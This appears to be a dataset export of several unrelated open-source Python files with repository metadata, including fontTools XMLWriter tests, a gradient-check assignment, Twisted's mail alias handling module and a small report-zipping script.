mask_new = 1.*mask
mask_new[mask==0] = float('nan')
plt.imshow(mask_new,
interpolation = 'none',
alpha = a_value,
vmin = 0, vmax = 1,
cmap = 'Reds')
| 33.382353 | 139 | 0.690419 |
74839ed5664567bbda6e44f085c0f79bc643e6ea | 699 | py | Python | tensorflow_datasets/question_answering/coqa/__init__.py | shubhamkumaR630/datasets | fe9ee91849cefed0953141ea3588f73b7def78fd | [
"Apache-2.0"
] | 2 | 2022-02-14T09:51:39.000Z | 2022-02-14T13:27:49.000Z | tensorflow_datasets/question_answering/coqa/__init__.py | shubhamkumaR630/datasets | fe9ee91849cefed0953141ea3588f73b7def78fd | [
"Apache-2.0"
] | null | null | null | tensorflow_datasets/question_answering/coqa/__init__.py | shubhamkumaR630/datasets | fe9ee91849cefed0953141ea3588f73b7def78fd | [
"Apache-2.0"
] | 1 | 2020-12-13T22:11:33.000Z | 2020-12-13T22:11:33.000Z | # coding=utf-8
# Copyright 2022 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""coqa dataset."""
from tensorflow_datasets.question_answering.coqa.coqa import Coqa
| 36.789474 | 74 | 0.76824 |
fd0ba89a2c0e0fa8bbb68a04f8ee3631e85ffd36 | 4,263 | py | Python | Tests/misc/xmlWriter_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-05-07T16:29:02.000Z | 2020-05-07T16:29:02.000Z | Tests/misc/xmlWriter_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 74 | 2020-01-30T07:27:54.000Z | 2021-08-03T05:47:17.000Z | Tests/misc/xmlWriter_test.py | anntzer/fonttools | 726cd67549956b985bbbe83e26fb0af9da59ddf7 | [
"MIT",
"BSD-3-Clause"
] | 1 | 2020-01-22T20:06:09.000Z | 2020-01-22T20:06:09.000Z | from fontTools.misc.py23 import *
import os
import unittest
from fontTools.misc.xmlWriter import XMLWriter
linesep = tobytes(os.linesep)
HEADER = b'<?xml version="1.0" encoding="UTF-8"?>' + linesep
class TestXMLWriter(unittest.TestCase):
def test_comment_escaped(self):
writer = XMLWriter(BytesIO())
writer.comment("This&that are <comments>")
self.assertEqual(HEADER + b"<!-- This&that are <comments> -->", writer.file.getvalue())
def test_comment_multiline(self):
writer = XMLWriter(BytesIO())
writer.comment("Hello world\nHow are you?")
self.assertEqual(HEADER + b"<!-- Hello world" + linesep + b" How are you? -->",
writer.file.getvalue())
def test_encoding_default(self):
writer = XMLWriter(BytesIO())
self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep,
writer.file.getvalue())
def test_encoding_utf8(self):
# https://github.com/fonttools/fonttools/issues/246
writer = XMLWriter(BytesIO(), encoding="utf8")
self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep,
writer.file.getvalue())
def test_encoding_UTF_8(self):
# https://github.com/fonttools/fonttools/issues/246
writer = XMLWriter(BytesIO(), encoding="UTF-8")
self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep,
writer.file.getvalue())
def test_encoding_UTF8(self):
# https://github.com/fonttools/fonttools/issues/246
writer = XMLWriter(BytesIO(), encoding="UTF8")
self.assertEqual(b'<?xml version="1.0" encoding="UTF-8"?>' + linesep,
writer.file.getvalue())
def test_encoding_other(self):
self.assertRaises(Exception, XMLWriter, BytesIO(),
encoding="iso-8859-1")
def test_write(self):
writer = XMLWriter(BytesIO())
writer.write("foo&bar")
self.assertEqual(HEADER + b"foo&bar", writer.file.getvalue())
def test_indent_dedent(self):
writer = XMLWriter(BytesIO())
writer.write("foo")
writer.newline()
writer.indent()
writer.write("bar")
writer.newline()
writer.dedent()
writer.write("baz")
self.assertEqual(HEADER + bytesjoin(["foo", " bar", "baz"], linesep),
writer.file.getvalue())
def test_writecdata(self):
writer = XMLWriter(BytesIO())
writer.writecdata("foo&bar")
self.assertEqual(HEADER + b"<![CDATA[foo&bar]]>", writer.file.getvalue())
def test_simpletag(self):
writer = XMLWriter(BytesIO())
writer.simpletag("tag", a="1", b="2")
self.assertEqual(HEADER + b'<tag a="1" b="2"/>', writer.file.getvalue())
def test_begintag_endtag(self):
writer = XMLWriter(BytesIO())
writer.begintag("tag", attr="value")
writer.write("content")
writer.endtag("tag")
self.assertEqual(HEADER + b'<tag attr="value">content</tag>', writer.file.getvalue())
def test_dumphex(self):
writer = XMLWriter(BytesIO())
writer.dumphex("Type is a beautiful group of letters, not a group of beautiful letters.")
self.assertEqual(HEADER + bytesjoin([
"54797065 20697320 61206265 61757469",
"66756c20 67726f75 70206f66 206c6574",
"74657273 2c206e6f 74206120 67726f75",
"70206f66 20626561 75746966 756c206c",
"65747465 72732e ", ""], joiner=linesep), writer.file.getvalue())
def test_stringifyattrs(self):
writer = XMLWriter(BytesIO())
expected = ' attr="0"'
self.assertEqual(expected, writer.stringifyattrs(attr=0))
self.assertEqual(expected, writer.stringifyattrs(attr=b'0'))
self.assertEqual(expected, writer.stringifyattrs(attr='0'))
self.assertEqual(expected, writer.stringifyattrs(attr=u'0'))
def test_carriage_return_escaped(self):
writer = XMLWriter(BytesIO())
writer.write("two lines\r\nseparated by Windows line endings")
self.assertEqual(
HEADER + b'two lines \nseparated by Windows line endings',
writer.file.getvalue())
def test_newlinestr(self):
header = b'<?xml version="1.0" encoding="UTF-8"?>'
for nls in (None, '\n', '\r\n', '\r', ''):
writer = XMLWriter(BytesIO(), newlinestr=nls)
writer.write("hello")
writer.newline()
writer.write("world")
writer.newline()
linesep = tobytes(os.linesep) if nls is None else tobytes(nls)
self.assertEqual(
header + linesep + b"hello" + linesep + b"world" + linesep,
writer.file.getvalue())
if __name__ == '__main__':
import sys
sys.exit(unittest.main())
| 33.304688 | 99 | 0.696223 |
b89bcabfdc13ad72fede6d69e6c776c12e99dcf8 | 2,526 | py | Python | cs224n/assignment1/q2_gradcheck.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | cs224n/assignment1/q2_gradcheck.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | cs224n/assignment1/q2_gradcheck.py | Rolight/Mooc-Assignments | 0031771c0662426af3cf9935051e3d35d08cca20 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import numpy as np
import random
# First implement a gradient checker by filling in the following functions
def gradcheck_naive(f, x):
""" Gradient check for a function f.
Arguments:
f -- a function that takes a single argument and outputs the
cost and its gradients
x -- the point (numpy array) to check the gradient at
"""
rndstate = random.getstate()
random.setstate(rndstate)
fx, grad = f(x) # Evaluate function value at original point
h = 1e-4 # Do not change this!
# Iterate over all indexes in x
it = np.nditer(x, flags=['multi_index'], op_flags=['readwrite'])
while not it.finished:
ix = it.multi_index
# Try modifying x[ix] with h defined above to compute
# numerical gradients. Make sure you call random.setstate(rndstate)
# before calling f(x) each time. This will make it possible
# to test cost functions with built in randomness later.
### YOUR CODE HERE:
x = x.astype(float)
x[ix] += h
random.setstate(rndstate)
fx1, grad1 = f(x)
x[ix] -= 2 * h
random.setstate(rndstate)
fx2, grad2 = f(x)
x[ix] += h
numgrad = (fx1 - fx2) / (2 * h)
### END YOUR CODE
# Compare gradients
reldiff = abs(numgrad - grad[ix]) / max(1, abs(numgrad), abs(grad[ix]))
if reldiff > 1e-5:
print "Gradient check failed."
print "First gradient error found at index %s" % str(ix)
print "Your gradient: %f \t Numerical gradient: %f" % (
grad[ix], numgrad)
return
it.iternext() # Step to next dimension
print "Gradient check passed!"
def sanity_check():
"""
Some basic sanity checks.
"""
quad = lambda x: (np.sum(x ** 2), x * 2)
print "Running sanity checks..."
gradcheck_naive(quad, np.array(123.456)) # scalar test
gradcheck_naive(quad, np.random.randn(3,)) # 1-D test
gradcheck_naive(quad, np.random.randn(4,5)) # 2-D test
print ""
def your_sanity_checks():
"""
Use this space add any additional sanity checks by running:
python q2_gradcheck.py
This function will not be called by the autograder, nor will
your additional tests be graded.
"""
print "Running your sanity checks..."
### YOUR CODE HERE
# raise NotImplementedError
### END YOUR CODE
if __name__ == "__main__":
sanity_check()
your_sanity_checks()
| 28.382022 | 79 | 0.605305 |
3e824d1cdcc28656b403fbacbfa69acc3f0f6088 | 105 | py | Python | pyecore/__init__.py | afonsobspinto/pyecore | a741243c68d1b6d3ed383165493531827d9c4c02 | [
"BSD-3-Clause"
] | null | null | null | pyecore/__init__.py | afonsobspinto/pyecore | a741243c68d1b6d3ed383165493531827d9c4c02 | [
"BSD-3-Clause"
] | null | null | null | pyecore/__init__.py | afonsobspinto/pyecore | a741243c68d1b6d3ed383165493531827d9c4c02 | [
"BSD-3-Clause"
] | null | null | null | """
"""
from .utils import install_issubclass_patch
__version__ = "0.8.6"
install_issubclass_patch()
| 10.5 | 43 | 0.733333 |
472f1f253f59e246ccf368725276c3e53bb61fc4 | 1,415 | py | Python | trailscraper/boto_service_definitions.py | flosell/trailscraper | 511a073ae75bba1cc4dd7b6bea1d51a70d95ad48 | [
"Apache-2.0"
] | 497 | 2018-01-08T15:36:05.000Z | 2022-03-30T14:11:54.000Z | trailscraper/boto_service_definitions.py | flosell/trailscraper | 511a073ae75bba1cc4dd7b6bea1d51a70d95ad48 | [
"Apache-2.0"
] | 97 | 2017-11-26T13:52:20.000Z | 2022-02-07T01:36:10.000Z | trailscraper/boto_service_definitions.py | flosell/trailscraper | 511a073ae75bba1cc4dd7b6bea1d51a70d95ad48 | [
"Apache-2.0"
] | 26 | 2019-04-04T21:37:29.000Z | 2022-02-18T10:23:07.000Z | """Helper Methods to get service definition information out of the boto library"""
import fnmatch
import json
import os
from pkg_resources import resource_filename, Requirement
def boto_service_definition_files():
"""Return paths to all service definition files from botocore"""
botocore_data_dir = resource_filename(Requirement.parse("botocore"), "botocore/data")
files = [os.path.join(dirname, file_in_dir)
for dirname, _, files_in_dir in os.walk(botocore_data_dir)
for file_in_dir in files_in_dir
if fnmatch.fnmatch(file_in_dir, 'service-*.json')]
return files
def service_definition_file(servicename):
"""Returns the path to the most recent service definition file for a service"""
boto_service_definition_files()
service_definitions_for_service = fnmatch.filter(boto_service_definition_files(),
"**/" + servicename + "/*/service-*.json")
service_definitions_for_service.sort()
return service_definitions_for_service[-1]
def operation_definition(servicename, operationname):
"""Returns the operation definition for a specific service and operation"""
with open(service_definition_file(servicename), encoding="UTF-8") as definition_file:
service_definition = json.loads(definition_file.read())
return service_definition['operations'][operationname]
| 38.243243 | 95 | 0.722968 |
cf6d727a692de15f339561a2cfe745e1d84ac42a | 25,305 | py | Python | IMU/VTK-6.2.0/ThirdParty/Twisted/twisted/mail/alias.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | 4 | 2016-03-30T14:31:52.000Z | 2019-02-02T05:01:32.000Z | IMU/VTK-6.2.0/ThirdParty/Twisted/twisted/mail/alias.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | 1 | 2020-03-06T04:49:42.000Z | 2020-03-06T04:49:42.000Z | IMU/VTK-6.2.0/ThirdParty/Twisted/twisted/mail/alias.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | 2 | 2019-08-30T23:36:13.000Z | 2019-11-08T16:52:01.000Z | # -*- test-case-name: twisted.mail.test.test_mail -*-
#
# Copyright (c) Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Support for aliases(5) configuration files.
@author: Jp Calderone
"""
import os
import tempfile
from twisted.mail import smtp
from twisted.internet import reactor
from twisted.internet import protocol
from twisted.internet import defer
from twisted.python import failure
from twisted.python import log
from zope.interface import implements, Interface
def handle(result, line, filename, lineNo):
"""
Parse a line from an aliases file.
@type result: L{dict} mapping L{bytes} to L{list} of L{bytes}
@param result: A dictionary mapping username to aliases to which
the results of parsing the line are added.
@type line: L{bytes}
@param line: A line from an aliases file.
@type filename: L{bytes}
@param filename: The full or relative path to the aliases file.
@type lineNo: L{int}
@param lineNo: The position of the line within the aliases file.
"""
parts = [p.strip() for p in line.split(':', 1)]
if len(parts) != 2:
fmt = "Invalid format on line %d of alias file %s."
arg = (lineNo, filename)
log.err(fmt % arg)
else:
user, alias = parts
result.setdefault(user.strip(), []).extend(map(str.strip, alias.split(',')))
def loadAliasFile(domains, filename=None, fp=None):
"""
Load a file containing email aliases.
Lines in the file should be formatted like so::
username: alias1, alias2, ..., aliasN
Aliases beginning with a C{|} will be treated as programs, will be run, and
the message will be written to their stdin.
Aliases beginning with a C{:} will be treated as a file containing
additional aliases for the username.
Aliases beginning with a C{/} will be treated as the full pathname to a file
to which the message will be appended.
Aliases without a host part will be assumed to be addresses on localhost.
If a username is specified multiple times, the aliases for each are joined
together as if they had all been on one line.
Lines beginning with a space or a tab are continuations of the previous
line.
Lines beginning with a C{#} are comments.
@type domains: L{dict} mapping L{bytes} to L{IDomain} provider
@param domains: A mapping of domain name to domain object.
@type filename: L{bytes} or L{NoneType <types.NoneType>}
@param filename: The full or relative path to a file from which to load
aliases. If omitted, the C{fp} parameter must be specified.
@type fp: file-like object or L{NoneType <types.NoneType>}
@param fp: The file from which to load aliases. If specified,
the C{filename} parameter is ignored.
@rtype: L{dict} mapping L{bytes} to L{AliasGroup}
@return: A mapping from username to group of aliases.
"""
result = {}
if fp is None:
fp = file(filename)
else:
filename = getattr(fp, 'name', '<unknown>')
i = 0
prev = ''
for line in fp:
i += 1
line = line.rstrip()
if line.lstrip().startswith('#'):
continue
elif line.startswith(' ') or line.startswith('\t'):
prev = prev + line
else:
if prev:
handle(result, prev, filename, i)
prev = line
if prev:
handle(result, prev, filename, i)
for (u, a) in result.items():
addr = smtp.Address(u)
result[u] = AliasGroup(a, domains, u)
return result
class IAlias(Interface):
"""
An interface for aliases.
"""
def createMessageReceiver():
"""
Create a message receiver.
@rtype: L{IMessage <smtp.IMessage>} provider
@return: A message receiver.
"""
class AliasBase:
"""
The default base class for aliases.
@ivar domains: See L{__init__}.
@type original: L{Address}
@ivar original: The original address being aliased.
"""
def __init__(self, domains, original):
"""
@type domains: L{dict} mapping L{bytes} to L{IDomain} provider
@param domains: A mapping of domain name to domain object.
@type original: L{bytes}
@param original: The original address being aliased.
"""
self.domains = domains
self.original = smtp.Address(original)
def domain(self):
"""
Return the domain associated with original address.
@rtype: L{IDomain} provider
@return: The domain for the original address.
"""
return self.domains[self.original.domain]
def resolve(self, aliasmap, memo=None):
"""
Map this alias to its ultimate destination.
@type aliasmap: L{dict} mapping L{bytes} to L{AliasBase}
@param aliasmap: A mapping of username to alias or group of aliases.
@type memo: L{NoneType <types.NoneType>} or L{dict} of L{AliasBase}
@param memo: A record of the aliases already considered in the
resolution process. If provided, C{memo} is modified to include
this alias.
@rtype: L{IMessage <smtp.IMessage>} or L{NoneType <types.NoneType>}
@return: A message receiver for the ultimate destination or None for
an invalid destination.
"""
if memo is None:
memo = {}
if str(self) in memo:
return None
memo[str(self)] = None
return self.createMessageReceiver()
class AddressAlias(AliasBase):
"""
An alias which translates one email address into another.
@type alias : L{Address}
@ivar alias: The destination address.
"""
implements(IAlias)
def __init__(self, alias, *args):
"""
@type alias: L{Address}, L{User}, L{bytes} or object which can be
converted into L{bytes}
@param alias: The destination address.
@type args: 2-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain}
provider, (1) L{bytes}
@param args: Arguments for L{AliasBase.__init__}.
"""
AliasBase.__init__(self, *args)
self.alias = smtp.Address(alias)
def __str__(self):
"""
Build a string representation of this L{AddressAlias} instance.
@rtype: L{bytes}
@return: A string containing the destination address.
"""
return '<Address %s>' % (self.alias,)
def createMessageReceiver(self):
"""
Create a message receiver which delivers a message to
the destination address.
@rtype: L{IMessage <smtp.IMessage>} provider
@return: A message receiver.
"""
return self.domain().exists(str(self.alias))
def resolve(self, aliasmap, memo=None):
"""
Map this alias to its ultimate destination.
@type aliasmap: L{dict} mapping L{bytes} to L{AliasBase}
@param aliasmap: A mapping of username to alias or group of aliases.
@type memo: L{NoneType <types.NoneType>} or L{dict} of L{AliasBase}
@param memo: A record of the aliases already considered in the
resolution process. If provided, C{memo} is modified to include
this alias.
@rtype: L{IMessage <smtp.IMessage>} or L{NoneType <types.NoneType>}
@return: A message receiver for the ultimate destination or None for
an invalid destination.
"""
if memo is None:
memo = {}
if str(self) in memo:
return None
memo[str(self)] = None
try:
return self.domain().exists(smtp.User(self.alias, None, None, None), memo)()
except smtp.SMTPBadRcpt:
pass
if self.alias.local in aliasmap:
return aliasmap[self.alias.local].resolve(aliasmap, memo)
return None
class FileWrapper:
"""
A message receiver which delivers a message to a file.
@type fp: file-like object
@ivar fp: A file used for temporary storage of the message.
@type finalname: L{bytes}
@ivar finalname: The name of the file in which the message should be
stored.
"""
implements(smtp.IMessage)
def __init__(self, filename):
"""
@type filename: L{bytes}
@param filename: The name of the file in which the message should be
stored.
"""
self.fp = tempfile.TemporaryFile()
self.finalname = filename
def lineReceived(self, line):
"""
Write a received line to the temporary file.
@type line: L{bytes}
@param line: A received line of the message.
"""
self.fp.write(line + '\n')
def eomReceived(self):
"""
Handle end of message by writing the message to the file.
@rtype: L{Deferred <defer.Deferred>} which successfully results in
L{bytes}
@return: A deferred which succeeds with the name of the file to which
the message has been stored or fails if the message cannot be
saved to the file.
"""
self.fp.seek(0, 0)
try:
f = file(self.finalname, 'a')
except:
return defer.fail(failure.Failure())
f.write(self.fp.read())
self.fp.close()
f.close()
return defer.succeed(self.finalname)
def connectionLost(self):
"""
Close the temporary file when the connection is lost.
"""
self.fp.close()
self.fp = None
def __str__(self):
"""
Build a string representation of this L{FileWrapper} instance.
@rtype: L{bytes}
@return: A string containing the file name of the message.
"""
return '<FileWrapper %s>' % (self.finalname,)
class FileAlias(AliasBase):
"""
An alias which translates an address to a file.
@ivar filename: See L{__init__}.
"""
implements(IAlias)
def __init__(self, filename, *args):
"""
@type filename: L{bytes}
@param filename: The name of the file in which to store the message.
@type args: 2-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain}
provider, (1) L{bytes}
@param args: Arguments for L{AliasBase.__init__}.
"""
AliasBase.__init__(self, *args)
self.filename = filename
def __str__(self):
"""
Build a string representation of this L{FileAlias} instance.
@rtype: L{bytes}
@return: A string containing the name of the file.
"""
return '<File %s>' % (self.filename,)
def createMessageReceiver(self):
"""
Create a message receiver which delivers a message to the file.
@rtype: L{FileWrapper}
@return: A message receiver which writes a message to the file.
"""
return FileWrapper(self.filename)
class ProcessAliasTimeout(Exception):
"""
An error indicating that a timeout occurred while waiting for a process
to complete.
"""
class MessageWrapper:
"""
A message receiver which delivers a message to a child process.
@type completionTimeout: L{int} or L{float}
@ivar completionTimeout: The number of seconds to wait for the child
process to exit before reporting the delivery as a failure.
@type _timeoutCallID: L{NoneType <types.NoneType>} or
L{IDelayedCall <twisted.internet.interfaces.IDelayedCall>} provider
@ivar _timeoutCallID: The call used to time out delivery, started when the
connection to the child process is closed.
@type done: L{bool}
@ivar done: A flag indicating whether the child process has exited
(C{True}) or not (C{False}).
@type reactor: L{IReactorTime <twisted.internet.interfaces.IReactorTime>}
provider
@ivar reactor: A reactor which will be used to schedule timeouts.
@ivar protocol: See L{__init__}.
@type processName: L{bytes} or L{NoneType <types.NoneType>}
@ivar processName: The process name.
@type completion: L{Deferred <defer.Deferred>}
@ivar completion: The deferred which will be triggered by the protocol
when the child process exits.
"""
implements(smtp.IMessage)
done = False
completionTimeout = 60
_timeoutCallID = None
reactor = reactor
def __init__(self, protocol, process=None, reactor=None):
"""
@type protocol: L{ProcessAliasProtocol}
@param protocol: The protocol associated with the child process.
@type process: L{bytes} or L{NoneType <types.NoneType>}
@param process: The process name.
@type reactor: L{NoneType <types.NoneType>} or L{IReactorTime
<twisted.internet.interfaces.IReactorTime>} provider
@param reactor: A reactor which will be used to schedule timeouts.
"""
self.processName = process
self.protocol = protocol
self.completion = defer.Deferred()
self.protocol.onEnd = self.completion
self.completion.addBoth(self._processEnded)
if reactor is not None:
self.reactor = reactor
def _processEnded(self, result):
"""
Record process termination and cancel the timeout call if it is active.
@type result: L{Failure <failure.Failure>}
@param result: The reason the child process terminated.
@rtype: L{NoneType <types.NoneType>} or
L{Failure <failure.Failure>}
@return: None, if the process end is expected, or the reason the child
process terminated, if the process end is unexpected.
"""
self.done = True
if self._timeoutCallID is not None:
# eomReceived was called, we're actually waiting for the process to
# exit.
self._timeoutCallID.cancel()
self._timeoutCallID = None
else:
# eomReceived was not called, this is unexpected, propagate the
# error.
return result
def lineReceived(self, line):
"""
Write a received line to the child process.
@type line: L{bytes}
@param line: A received line of the message.
"""
if self.done:
return
self.protocol.transport.write(line + '\n')
def eomReceived(self):
"""
Disconnect from the child process and set up a timeout to wait for it
to exit.
@rtype: L{Deferred <defer.Deferred>}
@return: A deferred which will be called back when the child process
exits.
"""
if not self.done:
self.protocol.transport.loseConnection()
self._timeoutCallID = self.reactor.callLater(
self.completionTimeout, self._completionCancel)
return self.completion
def _completionCancel(self):
"""
Handle the expiration of the timeout for the child process to exit by
terminating the child process forcefully and issuing a failure to the
L{completion} deferred.
"""
self._timeoutCallID = None
self.protocol.transport.signalProcess('KILL')
exc = ProcessAliasTimeout(
"No answer after %s seconds" % (self.completionTimeout,))
self.protocol.onEnd = None
self.completion.errback(failure.Failure(exc))
def connectionLost(self):
"""
Ignore notification of lost connection.
"""
def __str__(self):
"""
Build a string representation of this L{MessageWrapper} instance.
@rtype: L{bytes}
@return: A string containing the name of the process.
"""
return '<ProcessWrapper %s>' % (self.processName,)
class ProcessAliasProtocol(protocol.ProcessProtocol):
"""
A process protocol which errbacks a deferred when the associated
process ends.
@type onEnd: L{NoneType <types.NoneType>} or L{Deferred <defer.Deferred>}
@ivar onEnd: If set, a deferred on which to errback when the process ends.
"""
onEnd = None
def processEnded(self, reason):
"""
Call an errback.
@type reason: L{Failure <failure.Failure>}
@param reason: The reason the child process terminated.
"""
if self.onEnd is not None:
self.onEnd.errback(reason)
class ProcessAlias(AliasBase):
"""
An alias which is handled by the execution of a program.
@type path: L{list} of L{bytes}
@ivar path: The arguments to pass to the process. The first string is
the executable's name.
@type program: L{bytes}
@ivar program: The path of the program to be executed.
@type reactor: L{IReactorTime <twisted.internet.interfaces.IReactorTime>}
and L{IReactorProcess <twisted.internet.interfaces.IReactorProcess>}
provider
@ivar reactor: A reactor which will be used to create and timeout the
child process.
"""
implements(IAlias)
reactor = reactor
def __init__(self, path, *args):
"""
@type path: L{bytes}
@param path: The command to invoke the program consisting of the path
to the executable followed by any arguments.
@type args: 2-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain}
provider, (1) L{bytes}
@param args: Arguments for L{AliasBase.__init__}.
"""
AliasBase.__init__(self, *args)
self.path = path.split()
self.program = self.path[0]
def __str__(self):
"""
Build a string representation of this L{ProcessAlias} instance.
@rtype: L{bytes}
@return: A string containing the command used to invoke the process.
"""
return '<Process %s>' % (self.path,)
def spawnProcess(self, proto, program, path):
"""
Spawn a process.
This wraps the L{spawnProcess
<twisted.internet.interfaces.IReactorProcess.spawnProcess>} method on
L{reactor} so that it can be customized for test purposes.
@type proto: L{IProcessProtocol
<twisted.internet.interfaces.IProcessProtocol>} provider
@param proto: An object which will be notified of all events related to
the created process.
@type program: L{bytes}
@param program: The full path name of the file to execute.
@type path: L{list} of L{bytes}
@param path: The arguments to pass to the process. The first string
should be the executable's name.
@rtype: L{IProcessTransport
<twisted.internet.interfaces.IProcessTransport>} provider
@return: A process transport.
"""
return self.reactor.spawnProcess(proto, program, path)
def createMessageReceiver(self):
"""
Launch a process and create a message receiver to pass a message
to the process.
@rtype: L{MessageWrapper}
@return: A message receiver which delivers a message to the process.
"""
p = ProcessAliasProtocol()
m = MessageWrapper(p, self.program, self.reactor)
fd = self.spawnProcess(p, self.program, self.path)
return m
class MultiWrapper:
"""
A message receiver which delivers a single message to multiple other
message receivers.
@ivar objs: See L{__init__}.
"""
implements(smtp.IMessage)
def __init__(self, objs):
"""
@type objs: L{list} of L{IMessage <smtp.IMessage>} provider
@param objs: Message receivers to which the incoming message should be
directed.
"""
self.objs = objs
def lineReceived(self, line):
"""
Pass a received line to the message receivers.
@type line: L{bytes}
@param line: A line of the message.
"""
for o in self.objs:
o.lineReceived(line)
def eomReceived(self):
"""
Pass the end of message along to the message receivers.
@rtype: L{DeferredList <defer.DeferredList>} whose successful results
are L{bytes} or L{NoneType <types.NoneType>}
@return: A deferred list which triggers when all of the message
receivers have finished handling their end of message.
"""
return defer.DeferredList([
o.eomReceived() for o in self.objs
])
def connectionLost(self):
"""
Inform the message receivers that the connection has been lost.
"""
for o in self.objs:
o.connectionLost()
def __str__(self):
"""
Build a string representation of this L{MultiWrapper} instance.
@rtype: L{bytes}
@return: A string containing a list of the message receivers.
"""
return '<GroupWrapper %r>' % (map(str, self.objs),)
class AliasGroup(AliasBase):
"""
An alias which points to multiple destination aliases.
@type processAliasFactory: no-argument callable which returns
L{ProcessAlias}
@ivar processAliasFactory: A factory for process aliases.
@type aliases: L{list} of L{AliasBase} which implements L{IAlias}
@ivar aliases: The destination aliases.
"""
implements(IAlias)
processAliasFactory = ProcessAlias
def __init__(self, items, *args):
"""
Create a group of aliases.
Parse a list of alias strings and, for each, create an appropriate
alias object.
@type items: L{list} of L{bytes}
@param items: Aliases.
@type args: n-L{tuple} of (0) L{dict} mapping L{bytes} to L{IDomain}
provider, (1) L{bytes}
@param args: Arguments for L{AliasBase.__init__}.
"""
AliasBase.__init__(self, *args)
self.aliases = []
while items:
addr = items.pop().strip()
if addr.startswith(':'):
try:
f = file(addr[1:])
except:
log.err("Invalid filename in alias file %r" % (addr[1:],))
else:
addr = ' '.join([l.strip() for l in f])
items.extend(addr.split(','))
elif addr.startswith('|'):
self.aliases.append(self.processAliasFactory(addr[1:], *args))
elif addr.startswith('/'):
if os.path.isdir(addr):
log.err("Directory delivery not supported")
else:
self.aliases.append(FileAlias(addr, *args))
else:
self.aliases.append(AddressAlias(addr, *args))
def __len__(self):
"""
Return the number of aliases in the group.
@rtype: L{int}
@return: The number of aliases in the group.
"""
return len(self.aliases)
def __str__(self):
"""
Build a string representation of this L{AliasGroup} instance.
@rtype: L{bytes}
@return: A string containing the aliases in the group.
"""
return '<AliasGroup [%s]>' % (', '.join(map(str, self.aliases)))
def createMessageReceiver(self):
"""
Create a message receiver for each alias and return a message receiver
which will pass on a message to each of those.
@rtype: L{MultiWrapper}
@return: A message receiver which passes a message on to message
receivers for each alias in the group.
"""
return MultiWrapper([a.createMessageReceiver() for a in self.aliases])
def resolve(self, aliasmap, memo=None):
"""
Map each of the aliases in the group to its ultimate destination.
@type aliasmap: L{dict} mapping L{bytes} to L{AliasBase}
@param aliasmap: A mapping of username to alias or group of aliases.
@type memo: L{NoneType <types.NoneType>} or L{dict} of L{AliasBase}
@param memo: A record of the aliases already considered in the
resolution process. If provided, C{memo} is modified to include
this alias.
@rtype: L{MultiWrapper}
@return: A message receiver which passes the message on to message
receivers for the ultimate destination of each alias in the group.
"""
if memo is None:
memo = {}
r = []
for a in self.aliases:
r.append(a.resolve(aliasmap, memo))
return MultiWrapper(filter(None, r))
| 31.04908 | 89 | 0.592334 |
ec3661ddc38fe4da04624cb4b8f004fc142a080f | 1,350 | py | Python | zipper.py | mayankcodeops/museum_api | d93f94e7938e13e5a01f95cb930a87692e6bd166 | [
"MIT"
] | null | null | null | zipper.py | mayankcodeops/museum_api | d93f94e7938e13e5a01f95cb930a87692e6bd166 | [
"MIT"
] | 1 | 2021-12-07T09:47:31.000Z | 2021-12-07T09:47:31.000Z | zipper.py | mayankcodeops/museum_api | d93f94e7938e13e5a01f95cb930a87692e6bd166 | [
"MIT"
] | null | null | null | import logging
import zipfile
import os
from config import config
CONFIG_NAME = os.environ.get('CONFIG_NAME', 'default')
logging.basicConfig(filename='app.log', filemode='w', format='%(asctime)s : %(levelname)s : %(message)s',
level=logging.DEBUG)
def zip_reports(compressed_file, *args):
"""
Creates a compressed zip of all the reports in the desired directory
:compressed_file: name of the zip file to be created.
:args: takes in the files that are needed to be compressed to a zip file
"""
try:
with zipfile.ZipFile(compressed_file, 'w') as zipped_report:
for file in args:
file_path = os.path.join(config[CONFIG_NAME].REPORT_DIR, file)
if os.path.isfile(file_path):
zipped_report.write(file_path,
compress_type=zipfile.ZIP_DEFLATED)
else:
logging.error(f"No file with filename: {file} exists in the {config[CONFIG_NAME].REPORT_DIR}. "
f"Proceeding with other file compression")
except OSError as error:
logging.exception(f"OSError while writing reports import a zip: {error.args[-1]}")
if __name__ == '__main__':
zip_reports('reports.zip', 'museum.csv', 'museum.html', 'museum.pdf', 'museum.xml')
| 38.571429 | 115 | 0.624444 |
53449c2f118c7bdd197f5c421c9a494a06a7fff1 | 8,993 | py | Python | examples/generative_models/jtnn/jtnn/datautils.py | seqRep/dgl-lifesci | c4bd45be6dbb59dc270957ed90bb19d9ed6dc157 | [
"Apache-2.0"
] | 1 | 2020-06-22T19:19:24.000Z | 2020-06-22T19:19:24.000Z | examples/generative_models/jtnn/jtnn/datautils.py | seqRep/dgl-lifesci | c4bd45be6dbb59dc270957ed90bb19d9ed6dc157 | [
"Apache-2.0"
